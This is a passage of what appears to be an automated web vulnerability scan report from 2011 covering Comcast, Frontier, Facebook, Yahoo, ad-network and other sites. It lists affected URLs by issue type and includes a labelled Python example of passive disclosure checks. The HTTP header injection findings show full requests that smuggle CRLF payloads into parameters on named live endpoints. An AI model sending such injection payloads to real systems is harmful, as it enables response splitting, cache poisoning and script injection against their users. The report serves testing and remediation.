18.26. http://www.frontierhelp.com/frontiernetnews.cfm
18.27. http://www.frontierhelp.com/func.js
18.28. https://www.frontiermobile.com/data/Js/s_code.js
18.29. http://www.frontierpages.com/scripts/s_code.js
18.30. http://www.myfitv.com/javascripts/all.js
18.31. http://www.myfitv.com/javascripts/jquery.hoverIntent.js
18.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
18.33. https://www.optionshouse.com/tool/2011.09.01.19.07/asset/coreuiConcatMin.js
18.34. https://www.usps.com/ContentTemplates/assets/css/components.css
18.35. https://www.usps.com/ContentTemplates/assets/css/home.css
18.36. https://www.usps.com/ContentTemplates/assets/css/templates.css
18.37. https://www.usps.com/ContentTemplates/common/css/fonts.css
18.38. https://www.usps.com/ContentTemplates/common/css/globals/button-styles.css
18.39. https://www.usps.com/ContentTemplates/common/css/globals/links.css
18.40. https://www.usps.com/ContentTemplates/common/css/globals/modals.css
18.41. https://www.usps.com/ContentTemplates/common/css/globals/qt-modals.css
18.42. https://www.usps.com/ContentTemplates/common/css/globals/text-fields.css
18.43. https://www.usps.com/ContentTemplates/common/css/globals/tooltips.css
18.44. https://www.usps.com/ContentTemplates/common/css/globals/widgets/modal-fluid/modal-fluid.css
18.45. https://www.usps.com/ContentTemplates/common/css/usps-print.css
18.46. https://www.usps.com/ContentTemplates/common/css/usps.css
18.47. https://www.usps.com/ContentTemplates/common/scripts/usps/modules/usps/widget/carousel.js
18.48. https://www.usps.com/ContentTemplates/common/scripts/usps/modules/usps/widget/homecarousel.js
18.49. http://www.vonage.com/googlesearch/cluster.js
18.50. http://www.vonage.com/googlesearch/common.js
18.51. http://www.vonage.com/googlesearch/uri.js
19. Private IP addresses disclosed
19.1. http://api.facebook.com/restserver.php
19.2. http://connect.facebook.net/en_US/all.js
19.3. http://customer.comcast.com/Pages/FAQDisplay.aspx
19.4. http://external.ak.fbcdn.net/safe_image.php
19.5. http://external.ak.fbcdn.net/safe_image.php
19.6. http://external.ak.fbcdn.net/safe_image.php
19.7. http://external.ak.fbcdn.net/safe_image.php
19.8. http://external.ak.fbcdn.net/safe_image.php
19.9. http://external.ak.fbcdn.net/safe_image.php
19.10. http://external.ak.fbcdn.net/safe_image.php
19.11. http://external.ak.fbcdn.net/safe_image.php
19.12. http://frontier.com/AgentOrdering/customAppTabInfo/docobj.js
19.13. http://frontier.com/AgentOrdering/customAppTabInfo/tabNavigation.js
19.14. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js
19.15. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js
19.16. http://frontier.com/AgentOrdering/javascripts/validateinteger.js
19.17. http://frontier.com/Controls/VirtualCode.ashx
19.18. http://frontier.com/Controls/VirtualCode.ashx
19.19. http://frontier.com/Js/formHelpers.js
19.20. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js
19.21. http://frontier.com/Js/jQuery/jquery.maskedinput.js
19.22. http://frontier.com/Js/s_code.js
19.23. http://frontier.com/Resources/3rdParty/HBX/hbx.js
19.24. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js
19.25. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js
19.26. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js
19.27. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js
19.28. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js
19.29. http://frontier.com/images/FTRMain/frontier_Logo.jpg
19.30. http://frontier.com/images/FTRMain/gradientBox.png
19.31. http://frontier.com/images/FTRMain/small_arrow.png
19.32. http://frontier.com/images/icon_print.gif
19.33. http://frontier.com/js/jquery/jquery.numeric.js
19.34. http://static.ak.fbcdn.net/connect.php/js/FB.Share
19.35. http://static.ak.fbcdn.net/connect/xd_proxy.php
19.36. http://static.ak.fbcdn.net/connect/xd_proxy.php
19.37. http://static.ak.fbcdn.net/connect/xd_proxy.php
19.38. http://www.facebook.com/extern/login_status.php
19.39. http://www.facebook.com/extern/login_status.php
19.40. http://www.facebook.com/extern/login_status.php
19.41. http://www.facebook.com/extern/login_status.php
19.42. http://www.facebook.com/extern/login_status.php
19.43. http://www.facebook.com/extern/login_status.php
19.44. http://www.facebook.com/extern/login_status.php
19.45. http://www.facebook.com/extern/login_status.php
19.46. http://www.facebook.com/extern/login_status.php
19.47. http://www.facebook.com/extern/login_status.php
19.48. http://www.facebook.com/extern/login_status.php
19.49. http://www.facebook.com/extern/login_status.php
19.50. http://www.facebook.com/extern/login_status.php
19.51. http://www.facebook.com/extern/login_status.php
19.52. http://www.facebook.com/plugins/activity.php
19.53. http://www.facebook.com/plugins/like.php
19.54. http://www.facebook.com/plugins/like.php
19.55. http://www.facebook.com/plugins/like.php
19.56. http://www.facebook.com/plugins/like.php
19.57. http://www.facebook.com/plugins/like.php
19.58. http://www.facebook.com/plugins/like.php
19.59. http://www.facebook.com/plugins/like.php
19.60. http://www.facebook.com/plugins/like.php
19.61. http://www.facebook.com/plugins/like.php
19.62. http://www.facebook.com/plugins/like.php
19.63. http://www.facebook.com/plugins/like.php
19.64. http://www.facebook.com/plugins/like.php
19.65. http://www.facebook.com/plugins/like.php
19.66. http://www.facebook.com/plugins/like.php
19.67. http://www.facebook.com/plugins/like.php
19.68. http://www.facebook.com/plugins/likebox.php
19.69. http://www.facebook.com/plugins/likebox.php
19.70. http://www.facebook.com/plugins/likebox.php
19.71. http://www.fairpoint.com/scripts/script.js
19.72. http://www.frontier.com/Js/s_code.js
19.73. http://www.frontierhelp.com/
19.74. http://www.frontierpages.com/scripts/s_code.js
19.75. http://www.vonage.com/
19.76. http://www.vonage.com/
19.77. http://www.vonage.com/googlesearch/cluster.js
19.78. http://www.vonage.com/search.php
19.79. http://www.whitefence.com/static/Seymour.js
20. Social security numbers disclosed
21. Credit card numbers disclosed
21.1. http://ad.doubleclick.net/adj/myfitv.com/z300x250
21.2. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js
21.3. http://search.yahoo.com/search
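Sections 18, 19 and 21 above are passive checks: the scanner pattern-matches response bodies for email addresses, RFC 1918 addresses and card-number-shaped digit runs. The block below is an added example, not the scanner's own code, that reimplements those three checks over constructed sample bodies. It keeps the Luhn step that separates a plausible card number from an ordinary long digit run; the second sample reuses the 16-digit `J=` value visible in the global.ard.yahoo.com URLs above to show that an ad impression identifier fails Luhn and so should not be reported, while the Visa test number 4111111111111111 passes. The sample strings and the address ranges reported are assumptions of the example.

```python
"""Passive disclosure checks over response bodies (added example, not part of the report)."""
import ipaddress
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# 13 to 19 digits, optionally separated by single spaces or dashes, not embedded in a longer run
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def luhn_ok(digits):
    """Luhn mod-10 check on a string of ASCII digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_emails(body):
    return sorted(set(EMAIL_RE.findall(body)))


def find_private_ips(body):
    """Report only RFC 1918 addresses; version strings like 1.4.2.3 parse as IPs but are public."""
    found = set()
    for candidate in IPV4_RE.findall(body):
        try:
            ip = ipaddress.IPv4Address(candidate)
        except ValueError:  # e.g. 256.300.1.1: digit groups that are not octets
            continue
        if any(ip in net for net in RFC1918):
            found.add(candidate)
    return sorted(found)


def find_card_numbers(body):
    """Digit runs of card length that also pass Luhn; everything else is treated as noise."""
    hits = []
    for m in CARD_RE.finditer(body):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append(digits)
    return hits


def scan(body):
    return {
        "emails": find_emails(body),
        "private_ips": find_private_ips(body),
        "card_numbers": find_card_numbers(body),
    }


# Constructed sample bodies; the 16-digit value mirrors an ad impression id seen in the report URLs.
SAMPLES = {
    "support_page": "Contact webmaster@example.com or abuse@example.org for help.",
    "debug_js": "var origin='http://10.1.2.3:8080/api'; var cdn='203.0.113.7'; "
                "var v='1.4.2.3'; var bad='256.300.1.1';",
    "ad_script": "var imp='1315313295039208'; var test='4111111111111111';",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan(body))
```

Run as a script it prints one result line per sample; the `ad_script` body yields a single card hit even though it contains two 16-digit runs, which is the distinction a reviewer wants before escalating a "credit card numbers disclosed" entry on a tracking script.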
22. Robots.txt file
22.1. http://533-rgz-601.mktoresp.com/webevents/visitWebPage
22.2. http://a.adready.com/campaign_event/impression
22.3. http://a.analytics.yahoo.com/fpc.pl
22.4. http://ad.turn.com/server/ads.htm
22.5. http://ad.yieldmanager.com/pixel
22.6. http://ads.bluelithium.com/iframe3
22.7. http://ads.pointroll.com/PortalServe/
22.8. http://adserver.teracent.net/tase/ad
22.9. http://altfarm.mediaplex.com/ad/js/3484-103250-2056-0
22.10. http://api.facebook.com/restserver.php
22.11. http://api.recaptcha.net/challenge
22.12. http://as.casalemedia.com/j
22.13. http://as1.suitesmart.com/99917/G15493.js
22.14. http://autos.yahoo.com/
22.15. http://b.scorecardresearch.com/b
22.16. http://by.optimost.com/trial/471/p/customerhomepage.58a/57/content.js
22.17. http://cdn.optmd.com/V2/80181/197812/index.html
22.18. http://cdn.turn.com/server/ddc.htm
22.19. http://citizenstelecom.112.2o7.net/b/ss/cznfrontier/1/H.22.1/s93230034164153
22.20. http://comcast-www.baynote.net/baynote/tags3/common
22.21. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard
22.22. http://ec.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.swf
22.23. http://ehg-verizon.hitbox.com/HG
22.24. http://espanol.vonage.com/mpel.js
22.25. http://event.rtrk.com/event/
22.26. http://finance.yahoo.com/
22.27. http://fonts.googleapis.com/css
22.28. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
22.29. http://frontier.com/winwin1
22.30. http://g-pixel.invitemedia.com/gmatcher
22.31. http://games.frontier.com/
22.32. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp
22.33. https://go.ooma.com/activate
22.34. http://gws.maps.yahoo.com/MapImage
22.35. http://iar.worthathousandwords.com/iar.gif
22.36. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js
22.37. http://int.teracent.net/tase/int
22.38. http://integrate.112.2o7.net/dfa_echo
22.39. http://ips-invite.iperceptions.com/webValidator.aspx
22.40. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/
22.41. https://login.aptela.com/cgi/login.cgi
22.42. https://login.comcast.net/login
22.43. http://metrics.scottrade.com/b/ss/scottradecom,scottradeglobal/1/H.22.1/s98473441649693
22.44. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s95377543827053
22.45. http://movies.yahoo.com/
22.46. http://music.yahoo.com/
22.47. http://new.music.yahoo.com/
22.48. http://o.analytics.yahoo.com/fpc.pl
22.49. http://pagead2.googlesyndication.com/pagead/imgad
22.50. http://pixel.everesttech.net/2565/i
22.51. http://pixel.fetchback.com/serve/fb/pdc
22.52. http://pixel.invitemedia.com/data_sync
22.53. http://pixel.quantserve.com/api/segments.json
22.54. http://postcalc.usps.gov/WebResource.axd
22.55. http://r.casalemedia.com/r
22.56. http://realestate.yahoo.com/
22.57. http://s0.2mdn.net/1033846/mmna_i_likeable_300x250.swf
22.58. http://search.keywordblocks.com/
22.59. http://search.yahoo.com/search
22.60. http://segment-pixel.invitemedia.com/pixel
22.61. http://sensor2.suitesmart.com/sensor4.js
22.62. http://serviceo.comcast.net/b/ss/comcastdotcomprod/1/H.22.1/s91887737833894
22.63. http://servicetips.whitefence.com/
22.64. http://shopping.yahoo.com/
22.65. http://show.partners-z.com/s/show
22.66. http://sitesearch.comcast.com/static.php
22.67. http://spe.atdmt.com/ds/UXULASONYSPE/Bucky_Larson_Born_to_be_a_Star/300x250_BTBS_Dante_Yh1k.swf
22.68. http://speed.pointroll.com/PointRoll/Media/Banners/Apple/891280/dg2_300x250.jpg
22.69. http://static.ak.fbcdn.net/connect/xd_proxy.php
22.70. http://support.aptela.com:9000/tools/ResetPassword.cgi
22.71. http://t.invitemedia.com/track_imp
22.72. http://t.pointroll.com/PointRoll/Track/
22.73. http://tags.mathtag.com/view/js/
22.74. http://themes.googleusercontent.com/static/fonts/ubuntu/v1/_xyN3apAT_yRRDeqB3sPRg.woff
22.75. http://udmserve.net/udm/img.fetch
22.76. http://us.bc.yahoo.com/b
22.77. http://utdi.reachlocal.com/
22.78. http://utdi.reachlocal.net/index.html
22.79. http://video.music.yahoo.com/crossdomain.xml
22.80. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s91730218948796
22.81. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
22.82. http://www.aptela.com/lp2011/T2V1
22.83. http://www.burstnet.com/enlightn/8117/3E06/
22.84. http://www.comcast.com/shop/buyflow/default.ashx
22.85. https://www.comcast.com/Localization/Localize.cspx
22.86. http://www.facebook.com/plugins/like.php
22.87. http://www.frontier.com/yahoo/fy_excl2.aspx
22.88. https://www.frontier.com/AgentOrdering/Login/
22.89. http://www.google-analytics.com/siteopt.js
22.90. http://www.googleadservices.com/pagead/aclk
22.91. http://www.myfitv.com/portal/recent_tv_elastic
22.92. http://www.ooma.com/
22.93. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
22.94. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html
22.95. https://www.usps.com/tools/domesticratecalc/welcome.htm
22.96. http://www.vonage.com/
22.97. http://www.whitefence.com/category/home-phone/
22.98. http://www.zillow.com/app
22.99. http://www2.whitefence.com/a
22.100. http://xfinity.comcast.net/js-api/compressed/xpbar.js
23. Cacheable HTTPS response
23.1. https://login.comcast.net/myaccount/images/overlay-bg.png
23.2. https://login.comcast.net/myaccount/images/sprites/base.png
23.3. https://login.comcast.net/myaccount/images/sprites/gradient.png
23.4. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png
23.5. https://login.comcast.net/myaccount/js/additional-methods.min.js
23.6. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js
23.7. https://login.comcast.net/myaccount/js/jquery.validate.min.js
23.8. https://login.comcast.net/myaccount/js/omniture.js
23.9. https://login.comcast.net/myaccount/js/scripts.min.js
23.10. https://login.frontier.com/webmail/
23.11. https://us.etrade.com/e/t/jumppage/viewjumppage
23.12. https://www.comcast.com/Localization/QueryCompletion.cajax
23.13. https://www.comcastsupport.com/ChatEntry/
23.14. https://www.comcastsupport.com/ChatEntry/Content/Images/favicon.ico
23.15. https://www.comcastsupport.com/ChatEntry/Content/Images/mainbg.jpg
23.16. https://www.comcastsupport.com/ChatEntry/Content/Images/start_chat.png
23.17. https://www.comcastsupport.com/ChatEntry/Content/images/menubg.jpg
23.18. https://www.comcastsupport.com/ChatEntry/Forms/Suggestions.aspx
23.19. https://www.comcastsupport.com/ChatEntry/Forms/UserForm.aspx
23.20. https://www.comcastsupport.com/ChatEntry/eHelpProxy.asmx
23.21. https://www.comcastsupport.com/ChatEntry/img/xfinity/gradient.png
23.22. https://www.comcastsupport.com/chatentry/Default.aspx
23.23. https://www.fidelity.com/welcome/200-free-trades
23.24. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css
23.25. https://www.frontier.com/AgentOrdering/Login/
23.26. https://www.frontier.com/AgentOrdering/Login/Default.aspx
23.27. https://www.frontier.com/BillPay/Login.aspx
23.28. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale
23.29. https://www.frontier.com/Shop/Login.aspx
23.30. https://www.frontiermobile.com/data/
23.31. https://www.frontiermobile.com/favicon.ico
23.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
24. HTML does not specify charset
24.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2
24.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11
24.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12
24.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396
24.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400
24.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2
24.7. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101
24.8. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102
24.9. http://ad.doubleclick.net/adi/ober.frontier/$%7BSEG_IDS%7D
24.10. http://ad.doubleclick.net/adi/ober.frontier/product_119282623
24.11. http://ad.doubleclick.net/adi/ober.frontier/product_undefined
24.12. http://ad.yieldmanager.com/iframe3
24.13. http://ads.pointroll.com/PortalServe/
24.14. http://comcast-www.baynote.net/favicon.ico
24.15. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico
24.16. https://login.frontier.com/webmail/
24.17. https://login.frontiermobile.com/
24.18. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html
24.19. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
24.20. http://pixel.invitemedia.com/data_sync
24.21. http://sensor2.suitesmart.com/sensor4.js
24.22. http://uac.advertising.com/wrapper/aceUACping.htm
24.23. https://us.etrade.com/e/t/jumppage/viewjumppage
24.24. http://view.atdmt.com/MDS/iview/346808775/direct/01
24.25. http://view.atdmt.com/TR1/iview/332867993/direct/01
24.26. http://view.atdmt.com/ULA/iview/351127232/direct/01
24.27. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
24.28. http://www.comcast.com/2go/
24.29. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html
24.30. https://www.usps.com/tools/domesticratecalc/welcome.htm
24.31. http://www.vonage.com/googlesearch/get_results.php
24.32. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp
25. Content type incorrectly stated
25.1. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**
25.2. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**
25.3. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**
25.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**
25.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**
25.6. http://ads.yimg.com/a/a/ma/matt/yahoo_realestate_home180x40.jpeg
25.7. http://amch.questionmarket.com/adsc/d847178/33/873120/randm.js
25.8. http://beacon.dedicatednetworks.com/js/t.aspx
25.9. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1
25.10. http://cimage.adobe.com/omninav/thin_omninav2.0.4.js
25.11. http://comcast-www.baynote.net/baynote/tags3/common
25.12. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard
25.13. http://customer.comcast.com/App_Themes/Default/img/SubChannelSelected.gif
25.14. http://event.adxpose.com/event.flow
25.15. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css
25.16. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale
25.17. http://frontier.my.yahoo.com/e/js
25.18. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx
25.19. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico
25.20. http://ips-invite.iperceptions.com/webValidator.aspx
25.21. https://login.comcast.net/myaccount/images/overlay-bg.png
25.22. https://login.comcast.net/myaccount/images/sprites/base.png
25.23. https://login.comcast.net/myaccount/images/sprites/gradient.png
25.24. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png
25.25. https://login.comcast.net/myaccount/js/additional-methods.min.js
25.26. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js
25.27. https://login.comcast.net/myaccount/js/jquery.validate.min.js
25.28. https://login.comcast.net/myaccount/js/omniture.js
25.29. https://login.comcast.net/myaccount/js/scripts.min.js
25.30. http://maps.yahoo.com/services/bizloc/america/bizloc
25.31. http://new.music.yahoo.com/chartsHpJS.js
25.32. http://new.music.yahoo.com/rhap_status.html
25.33. http://new.music.yahoo.com/ymusicStayConnected/
25.34. http://pixel.fetchback.com/serve/fb/pdc
25.35. http://realestate.yahoo.com/autocomplete/cities.html
25.36. http://realestate.yahoo.com/robots.txt
25.37. http://sales.liveperson.net/hcp/html/mTag.js
25.38. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**
25.39. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**
25.40. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/59689.70851972699
25.41. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/78868.26389003545
25.42. http://sensor2.suitesmart.com/sensor4.js
25.43. http://sitesearch.comcast.com/
25.44. http://sitesearch.comcast.com/favicon.ico
25.45. http://verify.authorize.net/anetseal/images/secure90x72.gif
25.46. http://www.aptela.com/favicon.ico
25.47. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_Middle.gif
25.48. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_bottom.gif
25.49. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_top.gif
25.50. https://www.comcast.com/Localization/QueryCompletion.cajax
25.51. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css
25.52. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale
25.53. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css
25.54. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale
25.55. http://www.ooma.com/poormanscron/run-cron-check
25.56. http://www.ooma.com/sites/all/themes/ooma/img/home_savings_bar.png
25.57. http://www.vonage.com/googlesearch/get_results.php
25.58. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp
25.59. http://www.whitefence.com/favicon.ico
26. Content type is not specified
26.1. http://ad.yieldmanager.com/st
26.2. http://ads.pointroll.com/PortalServe/
1. HTTP header injection
There are 47 instances of this issue:
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
1.1. http://40.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://40.xg4ken.com
Path: /media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 90175%0d%0a2b5c414d0be was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2F&90175%0d%0a2b5c414d0be=1 HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d56463713%00%0D%0A1812607ce81; expires=Mon, 05-Dec-2011 11:51:59 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/?90175
2b5c414d0be=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
1.2. http://40.xg4ken.com/media/redir.php [url[] parameter]
Summary
Severity: High
Confidence: Certain
Host: http://40.xg4ken.com
Path: /media/redir.php
Issue detail
The value of the url[] request parameter is copied into the Location response header. The payload fda0b%0d%0ab73d971c7c4 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2Ffda0b%0d%0ab73d971c7c4 HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:57 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564e4a5efed390e8f23a4fed9e9; expires=Mon, 05-Dec-2011 11:51:57 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/fda0b
b73d971c7c4
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
1.3. http://pixel.everesttech.net/2565/c [url parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pixel.everesttech.net
Path: /2565/c
Issue detail
The value of the url request parameter is copied into the Location response header. The payload 6b47c%0d%0a72c5727bcc8 was submitted in the url parameter. This caused a response containing an injected HTTP header.
Request
GET /2565/c?ev_ct=d&ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811&url=http%3A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%3Futm_source%3Dyhofin%26utm_medium%3Dpaid-banner-ads%26utm_campaign%3D120x60-QuotesBttn%26utm_content%3Dstock%3AoldGrnBlk6b47c%0d%0a72c5727bcc8 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
